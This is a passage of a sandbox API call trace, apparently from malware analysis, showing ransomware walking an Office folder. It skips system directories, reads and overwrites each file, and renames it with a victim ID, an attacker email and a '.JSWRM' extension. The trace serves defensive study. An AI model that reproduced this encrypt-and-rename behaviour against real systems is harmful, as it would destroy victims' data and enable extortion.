lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0129.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0129.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0129.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0129.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0129.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0129.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart11.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART11.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart11.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0129.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0129.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0129.114] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe584, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART12.BDR", cAlternateFileName="")) returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2=".") returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="..") returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="...") returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="windows") returned -1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="recovery") returned -1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="perflogs") returned -1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="documents and settings") returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="system volume information") returned -1 [0129.114] lstrcmpiW (lpString1="MSART12.BDR", lpString2="msocache") returned -1 [0129.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART12.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART12.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART12.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0129.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART12.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART12.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART12.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0129.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0129.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0129.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart12.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.116] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58756) returned 1 [0129.116] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe580) returned 0x27b348 [0129.116] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe580, lpOverlapped=0x0) returned 1 [0129.121] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.121] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe580, lpOverlapped=0x0) returned 1 [0129.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.121] CloseHandle (hObject=0x238) returned 1 [0129.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0129.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0129.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0129.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0129.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0129.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0129.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0129.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0129.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0129.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0129.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart12.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART12.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart12.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0129.123] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17774bfd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1780d5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ed0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART13.BDR", cAlternateFileName="")) returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2=".") returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="..") returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="...") returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="windows") returned -1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="recovery") returned -1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="perflogs") returned -1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="documents and settings") returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="system volume information") returned -1 [0129.123] lstrcmpiW (lpString1="MSART13.BDR", lpString2="msocache") returned -1 [0129.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0129.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART13.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART13.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART13.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0129.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0129.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART13.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART13.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART13.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0129.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0129.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0129.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0129.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart13.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.124] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28368) returned 1 [0129.124] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6ed0) returned 0x27b348 [0129.124] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6ed0, lpOverlapped=0x0) returned 1 [0129.127] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.127] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6ed0, lpOverlapped=0x0) returned 1 [0129.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.127] CloseHandle (hObject=0x238) returned 1 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0129.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0129.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0129.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0129.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0129.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0129.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0129.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0129.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0129.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart13.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART13.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart13.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0129.129] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1770252c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1770252c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1770252c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8bc, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART14.BDR", cAlternateFileName="")) returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2=".") returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="..") returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="...") returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="windows") returned -1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="recovery") returned -1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="perflogs") returned -1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="documents and settings") returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="system volume information") returned -1 [0129.129] lstrcmpiW (lpString1="MSART14.BDR", lpString2="msocache") returned -1 [0129.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART14.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART14.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART14.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0129.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART14.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART14.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART14.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0129.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0129.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0129.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart14.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.131] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51388) returned 1 [0129.131] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc8b0) returned 0x27b348 [0129.131] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc8b0, lpOverlapped=0x0) returned 1 [0129.135] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.135] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc8b0, lpOverlapped=0x0) returned 1 [0129.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.136] CloseHandle (hObject=0x238) returned 1 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0129.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0129.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0129.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0129.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0129.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0129.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0129.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0129.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0129.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART14.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart14.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART14.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart14.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0129.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0129.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0129.137] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, 